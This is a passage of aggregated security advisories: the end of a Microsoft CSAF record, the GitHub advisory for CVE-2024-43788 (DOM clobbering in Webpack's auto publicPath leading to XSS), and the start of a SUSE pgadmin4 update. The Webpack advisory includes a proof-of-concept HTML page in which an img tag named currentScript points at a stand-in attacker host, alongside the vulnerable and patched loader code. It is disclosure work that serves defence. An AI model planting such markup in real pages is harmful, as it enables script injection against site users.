"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2024-43788 DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS) - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2024/msrc_cve-2024-43788.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)",
"tracking": {
"current_release_date": "2024-10-15T00:00:00.000Z",
"generator": {
"date": "2025-10-20T02:00:16.340Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2024-43788",
"initial_release_date": "2024-08-02T00:00:00.000Z",
"revision_history": [
{
"date": "2024-10-15T00:00:00.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 python-tensorboard 2.16.2-3",
"product": {
"name": "\u003cazl3 python-tensorboard 2.16.2-3",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "azl3 python-tensorboard 2.16.2-3",
"product": {
"name": "azl3 python-tensorboard 2.16.2-3",
"product_id": "17645"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 python-tensorboard 2.16.2-6",
"product": {
"name": "\u003cazl3 python-tensorboard 2.16.2-6",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 python-tensorboard 2.16.2-6",
"product": {
"name": "azl3 python-tensorboard 2.16.2-6",
"product_id": "19693"
}
}
],
"category": "product_name",
"name": "python-tensorboard"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-tensorboard 2.16.2-3 as a component of Azure Linux 3.0",
"product_id": "17084-2"
},
"product_reference": "2",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-tensorboard 2.16.2-3 as a component of Azure Linux 3.0",
"product_id": "17645-17084"
},
"product_reference": "17645",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-tensorboard 2.16.2-6 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-tensorboard 2.16.2-6 as a component of Azure Linux 3.0",
"product_id": "19693-17084"
},
"product_reference": "19693",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"17645-17084",
"19693-17084"
],
"known_affected": [
"17084-2",
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-43788 DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS) - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2024/msrc_cve-2024-43788.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T00:00:00.000Z",
"details": "2.16.2-3:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-2",
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"environmentalsScore": 0.0,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"temporalScore": 6.1,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"17084-2",
"17084-1"
]
}
],
"title": "DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)"
}
]
}
GHSA-4VVJ-4CPR-P986
Vulnerability from github – Published: 2024-08-27 19:50 – Updated: 2024-09-03 17:09
VLAI?
Summary
Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS
Details
Summary
We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
Gadgets found in Webpack
We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript)
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.
PoC
Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.
Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:
// entry.js
import('./import1.js')
.then(module => {
module.hello();
})
.catch(err => {
console.error('Failed to load module', err);
});
// import1.js
export function hello () {
console.log('Hello');
}
The webpack.config.js is set up as follows:
const path = require('path');
module.exports = {
entry: './entry.js', // Ensure the correct path to your entry file
output: {
filename: 'webpack-gadgets.bundle.js', // Output bundle file
path: path.resolve(__dirname, 'dist'), // Output directory
publicPath: "auto", // Or leave this field not set
},
target: 'web',
mode: 'development',
};
When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
<!DOCTYPE html>
<html>
<head>
<title>Webpack Example</title>
<!-- Attacker-controlled Script-less HTML Element starts--!>
<img name="currentScript" src="https://attacker.controlled.server/"></img>
<!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body>
</body>
</html>
Impact
This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.
Patch
A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.
Severity ?
6.4 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "webpack"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-alpha.0"
},
{
"fixed": "5.94.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-43788"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-27T19:50:40Z",
"nvd_published_at": "2024-08-27T17:15:07Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nWe found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack\u2019s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.\n\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n\n#### Gadgets found in Webpack\n\nWe identified a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() =\u003e {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl \u0026\u0026 document) {\n/******/ \t\t\tif (document.currentScript)\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i \u003e -1 \u0026\u0026 (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nHowever, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker\u0027s domain. This could lead to arbitrary script loading from the attacker\u0027s server, resulting in severe security risks.\n\n### PoC\n\nPlease note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I\u2019m providing a demo to illustrate the concept.\n\nConsider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:\n\n```\n// entry.js\nimport(\u0027./import1.js\u0027)\n .then(module =\u003e {\n module.hello();\n })\n .catch(err =\u003e {\n console.error(\u0027Failed to load module\u0027, err);\n });\n```\n\n```\n// import1.js\nexport function hello () {\n console.log(\u0027Hello\u0027);\n}\n```\n\nThe webpack.config.js is set up as follows:\n```\nconst path = require(\u0027path\u0027);\n\nmodule.exports = {\n entry: \u0027./entry.js\u0027, // Ensure the correct path to your entry file\n output: {\n filename: \u0027webpack-gadgets.bundle.js\u0027, // Output bundle file\n path: path.resolve(__dirname, \u0027dist\u0027), // Output directory\n publicPath: \"auto\", // Or leave this field not set\n },\n target: \u0027web\u0027,\n mode: \u0027development\u0027,\n};\n```\n\nWhen the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker\u0027s domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website\u0027s feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n \u003ctitle\u003eWebpack Example\u003c/title\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element starts--!\u003e\n \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element ends--!\u003e\n\u003c/head\u003e\n\u003cscript src=\"./dist/webpack-gadgets.bundle.js\"\u003e\u003c/script\u003e\n\u003cbody\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.\n\n### Patch\n\nA possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() =\u003e {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl \u0026\u0026 document) {\n/******/ \t\t\tif (document.currentScript \u0026\u0026 document.currentScript.tagName.toUpperCase() === \u0027SCRIPT\u0027) // Assume attacker cannot control script tag, otherwise it is XSS already :\u003e\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i \u003e -1 \u0026\u0026 (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nPlease note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.",
"id": "GHSA-4vvj-4cpr-p986",
"modified": "2024-09-03T17:09:18Z",
"published": "2024-08-27T19:50:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270"
},
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"type": "PACKAGE",
"url": "https://github.com/webpack/webpack"
},
{
"type": "WEB",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"type": "WEB",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Webpack\u0027s AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS"
}
SUSE-SU-2024:3771-1
Vulnerability from csaf_suse - Published: 2024-10-29 12:55 - Updated: 2024-10-29 12:55Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2024-38355: Fixed socket.io: unhandled 'error' event (bsc#1226967)
- CVE-2024-38998: Fixed requirejs: prototype pollution via function config (bsc#1227248)
- CVE-2024-38999: Fixed requirejs: prototype pollution via function s.contexts._.configure (bsc#1227252)
- CVE-2024-39338: Fixed axios: server-side request forgery due to requests for path relative URLs being processed as protocol relative URLs in axios (bsc#1229423)
- CVE-2024-4067: Fixed micromatch: vulnerable to Regular Expression Denial of Service (ReDoS) (bsc#1224366)
- CVE-2024-4068: Fixed braces: fails to limit the number of characters it can handle, which could lead to Memory Exhaustion (bsc#1224295)
- CVE-2024-43788: Fixed webpack: DOM clobbering gadget in AutoPublicPathRuntimeModule could lead to XSS (bsc#1229861)
- CVE-2024-48948: Fixed elliptic: ECDSA signature verification error due to leading zero may reject legitimate transactions in elliptic (bsc#1231684)
- CVE-2024-48949: Fixed elliptic: Missing Validation in Elliptic's EDDSA Signature Verification (bsc#1231564)
- CVE-2024-9014: Fixed OAuth2 issue that could lead to information leak (bsc#1230928)
Patchnames
SUSE-2024-3771,SUSE-SLE-Module-Python3-15-SP6-2024-3771,openSUSE-SLE-15.6-2024-3771
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2024-38355: Fixed socket.io: unhandled \u0027error\u0027 event (bsc#1226967)\n- CVE-2024-38998: Fixed requirejs: prototype pollution via function config (bsc#1227248)\n- CVE-2024-38999: Fixed requirejs: prototype pollution via function s.contexts._.configure (bsc#1227252)\n- CVE-2024-39338: Fixed axios: server-side request forgery due to requests for path relative URLs being processed as protocol relative URLs in axios (bsc#1229423)\n- CVE-2024-4067: Fixed micromatch: vulnerable to Regular Expression Denial of Service (ReDoS) (bsc#1224366)\n- CVE-2024-4068: Fixed braces: fails to limit the number of characters it can handle, which could lead to Memory Exhaustion (bsc#1224295)\n- CVE-2024-43788: Fixed webpack: DOM clobbering gadget in AutoPublicPathRuntimeModule could lead to XSS (bsc#1229861)\n- CVE-2024-48948: Fixed elliptic: ECDSA signature verification error due to leading zero may reject legitimate transactions in elliptic (bsc#1231684)\n- CVE-2024-48949: Fixed elliptic: Missing Validation in Elliptic\u0027s EDDSA Signature Verification (bsc#1231564)\n- CVE-2024-9014: Fixed OAuth2 issue that could lead to information leak (bsc#1230928)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2024-3771,SUSE-SLE-Module-Python3-15-SP6-2024-3771,openSUSE-SLE-15.6-2024-3771",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_3771-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2024:3771-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20243771-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2024:3771-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-October/019689.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1224366",
"url": "https://bugzilla.suse.com/1224366"
},
{
"category": "self",
"summary": "SUSE Bug 1226967",
"url": "https://bugzilla.suse.com/1226967"
},
{
"category": "self",
"summary": "SUSE Bug 1227248",
"url": "https://bugzilla.suse.com/1227248"
},
{
"category": "self",
"summary": "SUSE Bug 1227252",
"url": "https://bugzilla.suse.com/1227252"
},
{
"category": "self",
"summary": "SUSE Bug 1229423",
"url": "https://bugzilla.suse.com/1229423"
},
{
"category": "self",
"summary": "SUSE Bug 1229861",
"url": "https://bugzilla.suse.com/1229861"
},
{
"category": "self",
"summary": "SUSE Bug 1230928",
"url": "https://bugzilla.suse.com/1230928"
},
{
"category": "self",
"summary": "SUSE Bug 1231564",
"url": "https://bugzilla.suse.com/1231564"
},
{
"category": "self",
"summary": "SUSE Bug 1231684",
"url": "https://bugzilla.suse.com/1231684"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-38355 page",
"url": "https://www.suse.com/security/cve/CVE-2024-38355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-38998 page",
"url": "https://www.suse.com/security/cve/CVE-2024-38998/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-38999 page",
"url": "https://www.suse.com/security/cve/CVE-2024-38999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-39338 page",
"url": "https://www.suse.com/security/cve/CVE-2024-39338/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4067 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4067/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-43788 page",
"url": "https://www.suse.com/security/cve/CVE-2024-43788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-48948 page",
"url": "https://www.suse.com/security/cve/CVE-2024-48948/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-48949 page",
"url": "https://www.suse.com/security/cve/CVE-2024-48949/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-9014 page",
"url": "https://www.suse.com/security/cve/CVE-2024-9014/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2024-10-29T12:55:34Z",
"generator": {
"date": "2024-10-29T12:55:34Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2024:3771-1",
"initial_release_date": "2024-10-29T12:55:34Z",
"revision_history": [
{
"date": "2024-10-29T12:55:34Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-8.5-150600.3.6.1.noarch",
"product": {
"name": "pgadmin4-8.5-150600.3.6.1.noarch",
"product_id": "pgadmin4-8.5-150600.3.6.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"product": {
"name": "pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"product_id": "pgadmin4-cloud-8.5-150600.3.6.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"product": {
"name": "pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"product_id": "pgadmin4-desktop-8.5-150600.3.6.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-doc-8.5-150600.3.6.1.noarch",
"product": {
"name": "pgadmin4-doc-8.5-150600.3.6.1.noarch",
"product_id": "pgadmin4-doc-8.5-150600.3.6.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"product_id": "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch"
}
},
{
"category": "product_version",
"name": "system-user-pgadmin-8.5-150600.3.6.1.noarch",
"product": {
"name": "system-user-pgadmin-8.5-150600.3.6.1.noarch",
"product_id": "system-user-pgadmin-8.5-150600.3.6.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.6.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.6.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.6.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
